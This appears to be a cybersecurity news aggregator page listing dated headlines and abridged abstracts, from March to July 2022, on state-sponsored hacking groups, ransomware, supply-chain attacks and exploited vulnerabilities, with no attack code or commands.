Checkmarx warned of a new supply-chain attack that involves spoofing commit metadata to deceive GitHub developers into using malicious code. Commits are essential components of the GitHub system, and each has a unique hash or ID. Fake commits can be automatically generated and added to the use... (Cyware Alerts - Hacker News)
July 19, 2022
Russian Hackers Tricked Ukrainians with Fake “DoS Android Apps to Target Russia” Full Text
Abstract
Russian threat actors capitalized on the ongoing conflict against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites. Google Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB). "This is the first known instance of Turla distributing Android-related malware," TAG researcher Billy Leonard said. "The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services." It's worth noting that the onslaught of cyberattacks in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to form an IT Army to stage counter-DDoS attacks against Russian website... (The Hacker News)
July 19, 2022
Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads Full Text
Abstract
The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems. "These campaigns are believed to have targeted several Western diplomatic missions between May and June 2022," Palo Alto Networks Unit 42 said in a Tuesday report. "The lures included in these campaigns suggest targeting of a foreign embassy in Portugal as well as a foreign embassy in Brazil." APT29, also tracked under the monikers Cozy Bear, Cloaked Ursa, or The Dukes, has been characterized as an organized cyberespionage group working to collect intelligence that aligns with Russia's strategic objectives. Some aspects of the advanced persistent threat's activities, including the infamous SolarWinds supply chain attack of 2020, are separately tracked by Microsoft under the name Nobelium, with Mandiant calling i... (The Hacker News)
July 19, 2022
Researchers Reveal a New Technique to Unmask Anonymous Users Full Text
Abstract
Researchers from the New Jersey Institute of Technology warned of a unique tactic that can be used by threat actors to de-anonymize website visitors and link them to potential personal data. The technique analyzes subtle features of a target's browser activity to find out whether they are logged i... (Cyware Alerts - Hacker News)
July 19, 2022
Hacker Targeting Industrial Control Systems Full Text
Abstract
Several social media accounts were found promoting fake password-cracking software for PLC and HMI systems in order to deploy the Sality malware. Sality is an old malware family that relies on a distributed computing architecture to complete tasks such as cryptomining and password cracking, fa... (Cyware Alerts - Hacker News)
July 19, 2022
Russian hackers use fake DDoS app to infect pro-Ukrainian activists Full Text
Abstract
Google's Threat Analysis Group (TAG), whose primary goal is to defend Google users from state-sponsored attacks, said today that Russian-backed threat groups are still focusing their attacks on Ukrainian organizations. (BleepingComputer)
July 19, 2022
Russian SVR hackers use Google Drive, Dropbox to evade detection Full Text
Abstract
State-backed hackers belonging to the Russian Federation's Foreign Intelligence Service (SVR) have switched, for the first time, to using legitimate cloud storage services such as Google Drive to evade detection. (BleepingComputer)
July 18, 2022
Hackers Distributing Password Cracking Tool for PLCs and HMIs to Target Industrial Systems Full Text
Abstract
Industrial engineers and operators are the target of a new campaign that leverages password cracking software to seize control of Programmable Logic Controllers (PLCs) and co-opt the machines to a botnet. The software "exploited a vulnerability in the firmware which allowed it to retrieve the password on command," Dragos security researcher Sam Hanson said. "Further, the software was a malware dropper, infecting the machine with the Sality malware and turning the host into a peer in Sality's peer-to-peer botnet." The industrial cybersecurity firm said the password retrieval exploit embedded in the malware dropper is designed to recover the credential associated with Automation Direct DirectLOGIC 06 PLC. The exploit, tracked as CVE-2022-2003 (CVSS score: 7.7), has been described as a case of cleartext transmission of sensitive data that could lead to information disclosure and unauthorized changes. The issue was addressed in firmware Version 2.72 rele... (The Hacker News)
July 14, 2022
Microsoft links Holy Ghost ransomware operation to North Korean hackers Full Text
Abstract
For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries. (BleepingComputer)
July 14, 2022
The Lawfare Podcast: How Mercenary Hackers Sway Litigation Battles Full Text
Abstract
Alvaro Marañon sat down with Chris Bing and Raphael Satter to discuss the use of foreign hackers to win lawsuits and arbitration battles. (Lawfare)
July 14, 2022
Pro-Russia Hacker Group Killnet Targets Latvia Full Text
Abstract
The Russia-based Killnet group has been bombarding Latvia with a series of cyberattacks, including a 12-hour attack on one of its broadcasting centers. Hackers made a demand that Lithuania must allow transit of goods to Kaliningrad if they wanted to avoid more attacks on their government institutions a... (Cyware Alerts - Hacker News)
July 12, 2022
New ‘Luna Moth’ hackers breach orgs via fake subscription renewals Full Text
Abstract
A new data extortion group has been breaching companies to steal confidential information, threatening victims to make the files publicly available unless they pay a ransom. (BleepingComputer)
July 10, 2022
Attackers Picking Up Brute Ratel as an Alternative to Cobalt Strike Full Text
Abstract
Nation-state threat actors are leveraging Brute Ratel, a red-teaming attack simulation tool, to evade detection by EDR and antivirus, in place of Cobalt Strike. It costs around $2,500 per user for a one-year license, with customers having to provide a business email address that should be verified... (Cyware Alerts - Hacker News)
July 10, 2022
Experts demonstrate how to unlock several Honda models via Rolling-PWN attack Full Text
Abstract
Bad news for the owners of several Honda models: the Rolling-PWN Attack vulnerability can allow their vehicles to be unlocked. Security researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named... (Security Affairs)
July 4, 2022
Hacker Claims to Have Stolen 1 Billion Records of Chinese Citizens Full Text
Abstract
A hacker has claimed to have procured a trove of personal information from the Shanghai police on one billion Chinese citizens, which tech experts say, if true, would be one of the biggest data breaches in history. (Reuters)
July 4, 2022
Teen “Hackers” on Discord Selling Malware for Quick Cash Full Text
Abstract
Avast security researchers have discovered a server on Discord where a group of minors is involved in developing, upgrading, marketing, and selling malware and ransomware strains on the platform, supposedly to earn pocket money. (Hackread)
June 30, 2022
Update: North Korea-backed Hacking Collective Lazarus Group Suspected to be Behind Recent Harmony Bridge Attack Full Text
Abstract
On June 27, the culprit is said to have begun moving funds amounting to $39 million through the Tornado Cash mixer service in an attempt to obscure the ill-gotten gains and make it difficult to trace the transaction trail back to the original theft. (IT Security Guru)
June 30, 2022
North Korean Hackers Suspected to be Behind $100M Horizon Bridge Hack Full Text
Abstract
The notorious North Korea-backed hacking collective Lazarus Group is suspected to be behind the recent $100 million altcoin theft from Harmony Horizon Bridge, citing similarities to the Ronin bridge attack in March 2022. The finding comes as Harmony confirmed that its Horizon Bridge, a platform that allows users to move cryptocurrency across different blockchains, had been breached last week. The incident involved the exploiter carrying out multiple transactions on June 23 that extracted tokens stored in the bridge and subsequently made away with about $100 million in cryptocurrency. "The stolen crypto assets included Ether (ETH), Tether (USDT), Wrapped Bitcoin (WBTC) and BNB," blockchain analytics company Elliptic said in a new report. "The thief immediately used Uniswap – a decentralized exchange (DEX) – to convert much of these assets into a total of 85,837 ETH." Days later, on June 27, the culprit is said to have begun moving funds amounting to $39... (The Hacker News)
June 28, 2022
Evilnum hackers return in new operation targeting migration orgs Full Text
Abstract
The Evilnum hacking group is showing renewed signs of malicious activity, targeting European organizations that are involved in international migration. (BleepingComputer)
June 25, 2022
China-Based Tropic Trooper Adopts New Malware Variants and Custom Encryption to Target Victims Full Text
Abstract
The trojan is bundled in a greyware tool named SMS Bomber, which is used for DoS attacks against phones. Such tools are generally used by amateur threat actors who want to carry out attacks against sites. (Cyware Alerts - Hacker News)
June 23, 2022
Chinese Hackers Distributing SMS Bomber Tool with Malware Hidden Inside Full Text
Abstract
A threat cluster with ties to a hacking group called Tropic Trooper has been spotted using a previously undocumented malware coded in the Nim language to strike targets as part of a newly discovered campaign. The novel loader, dubbed Nimbda, is "bundled with a Chinese language greyware 'SMS Bomber' tool that is most likely illegally distributed in the Chinese-speaking web," Israeli cybersecurity company Check Point said in a report. "Whoever crafted the Nim loader took special care to give it the same executable icon as the SMS Bomber that it drops and executes," the researchers said. "Therefore the entire bundle works as a trojanized binary." SMS Bomber, as the name indicates, allows a user to input a phone number (not their own) so as to flood the victim's device with messages and potentially render it unusable in what's a denial-of-service (DoS) attack. The fact that the binary doubles up as SMS Bomber and a backdoor suggests that t... (The Hacker News)
June 23, 2022
Bronze Starlight Hacker Group Spreads Ransomware Using HUI Loader Full Text
Abstract
According to Secureworks' Counter Threat Unit (CTU) research team, two activity clusters related to HUI Loader have been connected to Chinese-speaking threat actors, namely Bronze Riverside and Bronze Starlight. (ZDNet)
June 23, 2022
Chinese hackers use ransomware as decoy for cyber espionage Full Text
Abstract
Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and Western companies are deploying ransomware as a decoy to cover up their malicious activities. (BleepingComputer)
June 21, 2022
New ToddyCat Hacker Group on Experts’ Radar After Targeting MS Exchange Servers Full Text
Abstract
An advanced persistent threat (APT) actor codenamed ToddyCat has been linked to a string of attacks aimed at high-profile entities in Europe and Asia since at least December 2020. The relatively new adversarial collective is said to have commenced its operations by targeting Microsoft Exchange servers in Taiwan and Vietnam using an unknown exploit to deploy the China Chopper web shell and activate a multi-stage infection chain. Other prominent countries targeted include Afghanistan, India, Indonesia, Iran, Kyrgyzstan, Malaysia, Pakistan, Russia, Slovakia, Thailand, the U.K., and Uzbekistan, just as the threat actor evolved its toolset over the course of different campaigns. "The first wave of attacks exclusively targeted Microsoft Exchange Servers, which were compromised with Samurai, a sophisticated passive backdoor that usually works on ports 80 and 443," Russian cybersecurity company Kaspersky said in a report published today. "The malware allows arbitrary C#... (The Hacker News)
June 17, 2022
Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company Full Text
Abstract
Experts uncovered enterprise-grade surveillance malware dubbed Hermit used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered enterprise-grade Android surveillance spyware, named Hermit,... (Security Affairs)
June 09, 2022
Chinese hacking group Aoqin Dragon quietly spied on orgs for a decade Full Text
Abstract
A previously unknown Chinese-speaking threat actor has been uncovered by threat analysts at SentinelLabs, who were able to link it to malicious activity going as far back as 2013. (BleepingComputer)
June 02, 2022
Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability Full Text
Abstract
Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134. "Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server," it said in an advisory. "There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix." Specifics of the security flaw have been withheld until a software patch is available. All supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is... (The Hacker News)
May 31, 2022
Hackers steal WhatsApp accounts using call forwarding trick Full Text
Abstract
There's a trick that allows attackers to hijack a victim's WhatsApp account and gain access to personal messages and contact list. (BleepingComputer)
May 29, 2022
Pro-Russian hacker group KillNet plans to attack Italy on May 30 Full Text
Abstract
Pro-Russian hacker group KillNet is threatening Italy again, announcing a massive and unprecedented attack on May 30... (Security Affairs)
May 26, 2022
Hackers Increasingly Using Browser Automation Frameworks for Malicious Activities Full Text
Abstract
Cybersecurity researchers are calling attention to a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns. "The framework contains numerous features which we assess may be utilized in the enablement of malicious activities," researchers from Team Cymru said in a new report published Wednesday. "The technical entry bar for the framework is purposefully kept low, which has served to create an active community of content developers and contributors, with actors in the underground economy advertising their time for the creation of bespoke tooling." The U.S. cybersecurity company said it observed command-and-control (C2) IP addresses associated with malware such as Bumblebee, BlackGuard, and RedLine Stealer establishing connections to the downloads subdomain of Bablosoft ("downloads.bablosoft[.]com"), the maker of the Browser Automation Studio (BAS). Bablosoft was previously... (The Hacker News)
May 25, 2022
Hacker says hijacking libraries, stealing AWS keys was ethical research Full Text
Abstract
The hacker of 'ctx' and 'PHPass' libraries has now broken silence and explained the reasons behind this hijack to BleepingComputer. According to the hacker, this was a bug bounty exercise and no malicious activity was intended. (BleepingComputer)
May 23, 2022
Threat actors target the infoSec community with fake PoC exploits Full Text
Abstract
Researchers uncovered a malware campaign targeting the infosec community with fake proof-of-concept (PoC) exploits to deliver a Cobalt Strike beacon. Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infosec community. The expert... (Security Affairs)
May 19, 2022
Lazarus hackers target VMware servers with Log4Shell exploits Full Text
Abstract
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers. (BleepingComputer)
May 17, 2022
North Korean devs pose as US freelancers to aid DPRK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions. (BleepingComputer)
May 11, 2022
Hackers are using tech services companies as a ‘launchpad’ for attacks on customers Full Text
Abstract
A warning from international cybersecurity agencies has urged IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks. (ZDNet)
May 09, 2022
Hackers display “blood is on your hands” on Russian TV, take down RuTube Full Text
Abstract
Hackers continue to target Russia with cyberattacks, defacing Russian TV to show pro-Ukrainian messages and taking down the RuTube video streaming site. (BleepingComputer)
May 09, 2022
Hackers exploiting critical F5 BIG-IP bug, public exploits released Full Text
Abstract
Threat actors have started massively exploiting the critical vulnerability tracked as CVE-2022-1388, which affects multiple versions of all F5 BIG-IP modules, to drop malicious payloads. (BleepingComputer)
May 06, 2022
Hackers Using PrivateLoader PPI Service to Distribute New NetDooka Malware Full Text
Abstract
A pay-per-install (PPI) malware service known as PrivateLoader has been spotted distributing a "fairly sophisticated" framework called NetDooka, granting attackers complete control over the infected devices. "The framework is distributed via a pay-per-install (PPI) service and contains multiple parts, including a loader, a dropper, a protection driver, and a full-featured remote access trojan (RAT) that implements its own network communication protocol," Trend Micro said in a report published Thursday. PrivateLoader, as documented by Intel 471 in February 2022, functions as a downloader responsible for downloading and installing additional malware onto the infected system, including SmokeLoader, RedLine Stealer, Vidar, Raccoon, GCleaner, and Anubis. Featuring anti-analysis techniques, PrivateLoader is written in the C++ programming language and is said to be in active development, with the downloader malware family gaining traction among multiple threat ac... (The Hacker News)
May 4, 2022
Chinese Naikon Group Back with New Espionage Attack Full Text
Abstract
The spear-phishing email consists of a weaponized document pretending to be a call for tender. Two payloads are hidden in the document as document properties. (Cyware Alerts - Hacker News)
May 04, 2022
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies Full Text
Abstract
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America. "The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said. "In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data." Winnti, also tracked by other... (The Hacker News)
May 04, 2022
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers Full Text
Abstract
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted. "Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report. "Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added. One notable threat actor is Curious Gorge, which TAG has attributed to China's People's Liberation Army Strategic Support Force (PLA SSF) and has been observed striking government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. Attacks aimed at Russia have singled out several governmental entiti... (The Hacker News)
May 3, 2022
Lapsus$ Eyes SharePoint, VPNs, and VMs Full Text
Abstract
A new report revealed the techniques and tactics behind the highly unpredictable attacks by the Lapsus$ gang, along with its interest in exploiting SharePoint, VPNs, and VMs. Researchers have observed mass deletion of VMs, storage, and configurations in cloud environments. For rem... (Cyware Alerts - Hacker News)
May 3, 2022
TA410 Group has Got New Tools and Three Teams Working Under it Full Text
Abstract
Analysts revealed that threat group TA410 comprises three independent subgroups that have been operating globally since 2018 to collect intelligence data via phishing campaigns. TA410 shares behavioral and tooling overlaps with APT10 and has a history of targeting U.S.-based organizations. Organizat... (Cyware Alerts - Hacker News)
May 02, 2022
New Hacker Group Pursuing Corporate Employees Focused on Mergers and Acquisitions Full Text
Abstract
A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments. Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are said to mirror techniques used by different Russia-based hacking crews like APT28 and APT29. "The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the 'advanced' in Advanced Persistent Threat," the threat intelligence firm said in a Monday report. The initial access route is unknown but upon gaining a foothold, attack chains involving UNC3524 culminate in the deployment of a novel backdoor called QUIETEXIT for persistent remote access for as long as... (The Hacker News)
May 02, 2022
Chinese “Override Panda” Hackers Resurface With New Espionage Attacks Full Text
Abstract
A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country." Override Panda, also called Naikon, Hellsing, and Bronze Geneva, has been operating on behalf of Chinese interests since at least 2005, conducting intelligence-gathering operations targeting ASEAN countries. Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malware... (The Hacker News)
May 02, 2022
Cyberspies use IP cameras to deploy backdoors, steal Exchange emails Full Text
Abstract
A newly discovered and uncommonly stealthy Advanced Persistent Threat (APT) group is breaching corporate networks to steal Exchange (on-premise and online) emails from employees involved in corporate transactions such as mergers and acquisitions. (BleepingComputer)
May 01, 2022
Russian hackers compromise embassy emails to target governments Full Text
Abstract
Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities. (BleepingComputer)
April 28, 2022
Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group Full Text
Abstract
A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling TA410 an umbrella group comprising three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure." TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S.-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa. Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Isra... (The Hacker News)
April 27, 2022
U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers Full Text
Abstract
The U.S. government on Tuesday announced up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service. "These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program said. All six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to have been operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data. The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), are as follows - Artem Valeryevich Ochichenko, who has been linked to technical reconnaissa... (The Hacker News)
April 27, 2022
Chinese state-backed hackers now target Russian state officers Full Text
Abstract
Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President). (BleepingComputer)
April 26, 2022
TeamTNT has Updated its Attack Tactics Full Text
Abstract
TeamTNT hackers' shell scripts were found disabling cloud security tools to attack AWS and Alibaba Cloud. Its payloads include credential stealers, cryptocurrency miners, persistence, and lateral movement. Organizations are advised to continue taking the right measures to protect their systems fro... (Cyware Alerts - Hacker News)
April 26, 2022
Gold Ulrick Hackers Still in Action Despite Massive Conti Ransomware Leak
Abstract
The infamous ransomware group known as Conti has continued its onslaught against entities despite suffering a massive data leak of its own earlier this year, according to new research. Conti, attributed to a Russia-based threat actor known as Gold Ulrick, is one of the most prevalent malware strains in the ransomware landscape, accounting for 19% of all attacks during the three-month period between October and December 2021. One of the most prolific ransomware groups of the last year alongside the likes of LockBit 2.0, PYSA, and Hive, Conti has locked the networks of hospitals, businesses, and government agencies, while receiving a ransom payment in exchange for sharing the decryption key as part of its name-and-shame scheme. But after the cybercriminal cartel came out in support of Russia over its invasion of Ukraine in February, an anonymous Ukrainian security researcher under the Twitter handle ContiLeaks began leaking the source code as well as private conversations between... The Hacker News
April 25, 2022
North Korean hackers targeting journalists with novel malware
Abstract
North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain.BleepingComputer
April 22, 2022
Russian hackers are seeking alternative money-laundering options
Abstract
The Russian cybercrime community, one of the most active and prolific in the world, is turning to alternative money-laundering methods due to sanctions on Russia and law enforcement actions against dark web markets.BleepingComputer
April 22, 2022
Chinese hackers behind most zero-day exploits during 2021
Abstract
Threat analysts report that zero-day vulnerability exploitation is on the rise with Chinese hackers using most of them in attacks last year.BleepingComputer
April 22, 2022
TeamTNT Targets Linux Instances on AWS, Alibaba Cloud for Credential Theft and Cryptomining
Abstract
TeamTNT is actively modifying its scripts after they were made public by security researchers. These scripts primarily target Amazon Web Services, but can also run on on-premises, container, or other forms of Linux instances.Cisco Talos
April 21, 2022
Hackers earn $400K for zero-day ICS exploits demoed at Pwn2Own
Abstract
Pwn2Own Miami 2022 has ended with competitors earning $400,000 for 26 zero-day exploits (and several bug collisions) targeting ICS and SCADA products demoed during the contest between April 19 and April 21.BleepingComputer
April 18, 2022
Cyberattackers Put the Pedal to the Medal: Podcast
Abstract
Fortinet’s Derek Manky discusses the exponential increase in the speed that attackers weaponize fresh vulnerabilities, where botnets and offensive automation fit in, and the ramifications for security teams.Threatpost
April 10, 2022
Facebook blocked Russia and Belarus threat actors' activity against Ukraine
Abstract
Facebook/Meta said Russia-linked threat actors are attempting to use the social network against Ukraine with hate speech, bullying, and fake news. Facebook/Meta revealed that Russia-linked threat actors are attempting to weaponize the social network...Security Affairs
April 9, 2022
China-linked threat actors target Indian Power Grid organizations
Abstract
China-linked threat actors continue to target Indian power grid organizations; most of the attacks involved the ShadowPad backdoor. Recorded Future's Insikt Group researchers uncovered a campaign conducted by a China-linked threat actor targeting...Security Affairs
April 08, 2022
Chinese Hacker Groups Continue to Target Indian Power Grid Assets
Abstract
China-linked adversaries have been attributed to an ongoing onslaught against Indian power grid organizations, one year after a concerted campaign targeting critical infrastructure in the country came to light. Most of the intrusions involved a modular backdoor named ShadowPad, according to Recorded Future's Insikt Group, a sophisticated remote access trojan which has been dubbed a "masterpiece of privately sold malware in Chinese espionage." "ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers said. The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingency... The Hacker News
April 8, 2022
FIN7 Forays into Ransomware Attack Landscape with New Tools
Abstract
Mandiant warned about the ambitions of the FIN7 group, which has shown strong signs of entering ransomware operations. The group's presence has been reported before attack events from Maze, Darkside, BlackCat, and Ryuk. Recently, it has been observed showing off a novel backdoor and new mali... Cyware Alerts - Hacker News
April 7, 2022
Deep Panda Uses Fire Chili Windows Rootkit
Abstract
Deep Panda was found exploiting Log4Shell to deploy the new Fire Chili rootkit in compromised networks of organizations in the travel, finance, and cosmetic industries. Fire Chili helps keep file operations, registry key additions, processes, and malicious network connections concealed from the us... Cyware Alerts - Hacker News
April 7, 2022
A Bad Luck BlackCat
Abstract
Kaspersky claims that at least some members of the new BlackCat group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool we call Fendr and which has only been observed in BlackMatter activity.Securelist
April 05, 2022
FIN7 Hackers Leveraging Password Reuse and Software Supply Chain Attacks
Abstract
The notorious cybercrime group known as FIN7 has diversified its initial access vectors to incorporate software supply chain compromise and the use of stolen credentials, new research has revealed. "Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time," incident response firm Mandiant said in a Monday analysis. The cybercriminal group, since its emergence in the mid-2010s, has gained notoriety for large-scale malware campaigns targeting the point-of-sale (POS) systems of the restaurant, gambling, and hospitality industries with credit card-stealing malware. FIN7's shift in monetization strategy towards ransomware follows an October 2021 report from Recorded Future's Gemini Advisory unit, which found the adversary setting up a fake front company named Bastion Secure to recruit unwitt... The Hacker News
April 05, 2022
Chinese hackers abuse VLC Media Player to launch malware loader
Abstract
Security researchers have uncovered a long-running malicious campaign from hackers associated with the Chinese government who are using VLC Media Player to launch a custom malware loader.BleepingComputer
April 04, 2022
Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware
Abstract
At least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information. The campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan. "The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region," Check Point Research said in a report. "Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks." The infection chains of El Machete, a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy doc... The Hacker News
April 04, 2022
FIN7 hackers evolve toolset, work with multiple ransomware gangs
Abstract
Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the actor is still very active, evolving, and trying new monetization methods.BleepingComputer
April 01, 2022
British Police Charge Two Teenagers Linked to LAPSUS$ Hacker Group
Abstract
The City of London Police on Friday disclosed that it has charged two of the seven teenagers, a 16-year-old and a 17-year-old, who were arrested last week for their alleged connections to the LAPSUS$ data extortion gang. "Both teenagers have been charged with: three counts of unauthorized access to a computer with intent to impair the reliability of data; one count of fraud by false representation and one count of unauthorized access to a computer with intent to hinder access to data," Detective Inspector Michael O'Sullivan, from the City of London Police, said in a statement. In addition, the unnamed 16-year-old minor has been charged with one count of causing a computer to perform a function to secure unauthorized access to a program. The charges come as the City of London Police moved to arrest seven suspected LAPSUS$ gang members aged between 16 and 21 on March 25, with the agency telling The Hacker News that all the individuals had been subsequently "re... The Hacker News
April 01, 2022
North Korean Hackers Distributing Trojanized DeFi Wallet Apps to Steal Victims' Crypto
Abstract
The North Korean state-backed hacking crew, otherwise known as the Lazarus Group, has been attributed to yet another financially motivated campaign that leverages a trojanized decentralized finance (DeFi) wallet app to distribute a fully-featured backdoor onto compromised Windows systems. The app, which is equipped with functionalities to save and manage a cryptocurrency wallet, is also designed to trigger the launch of the implant that can take control of the infected host. Russian cybersecurity firm Kaspersky said it first encountered the rogue application in mid-December 2021. The infection scheme initiated by the app also results in the deployment of the installer for a legitimate application, which gets overwritten with a trojanized version in an effort to cover its tracks. That said, the initial access avenue is unclear, although it's suspected to be a case of social engineering. The spawned malware, which masquerades as Google's Chrome web browser, subsequently... The Hacker News
March 31, 2022
Chinese hacking group uses new 'Fire Chili' Windows rootkit
Abstract
The Chinese APT group known as Deep Panda has been spotted in a recent campaign targeting VMware Horizon servers with the Log4Shell exploit to deploy a novel rootkit named 'Fire Chili'.BleepingComputer
March 29, 2022
Hackers Gaining Power of Subpoena Via Fake "Emergency Data Requests" – Krebs on Security
Abstract
There is a terrifying and highly effective “method” that criminal hackers are now using to harvest sensitive customer data from Internet service providers, phone companies, and social media firms.Krebs on Security
March 26, 2022
Another Chinese Hacking Group Spotted Targeting Ukraine Amid Russia Invasion
Abstract
A Chinese-speaking threat actor called Scarab has been linked to a custom backdoor dubbed HeaderTip as part of a campaign targeting Ukraine since Russia embarked on an invasion last month, making it the second China-based hacking group after Mustang Panda to capitalize on the conflict. "The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began," SentinelOne researcher Tom Hegel said in a report published this week. SentinelOne's analysis follows an advisory from Ukraine's Computer Emergency Response Team (CERT-UA) earlier this week outlining a spear-phishing campaign that leads to the delivery of a RAR archive file, which comes with an executable that's designed to open a decoy file while stealthily dropping a malicious DLL called HeaderTip in the background. Scarab was first documented by the Symantec Threat Hunter Team, part of Broadcom Software, in January 2015, when i... The Hacker News
March 24, 2022
North Korean Hackers Exploited Chrome Zero-Day to Target Fintech, IT, and Media Firms
Abstract
Google's Threat Analysis Group (TAG) on Thursday disclosed that it acted to mitigate threats from two distinct government-backed attacker groups based in North Korea that exploited a recently uncovered remote code execution flaw in the Chrome web browser. The campaigns, once again "reflective of the regime's immediate concerns and priorities," are said to have targeted U.S.-based organizations spanning news media, IT, cryptocurrency, and fintech industries, with one set of the activities sharing direct infrastructure overlaps with previous attacks aimed at security researchers last year. The shortcoming in question is CVE-2022-0609, a use-after-free vulnerability in the browser's Animation component that Google addressed as part of updates (version 98.0.4758.102) issued on February 14, 2022. It's also the first zero-day flaw patched by the tech giant since the start of 2022. "The earliest evidence we have of this exploit kit being actively deploy... The Hacker News
March 24, 2022
Experts explained how to hack a building controller widely adopted in Russia
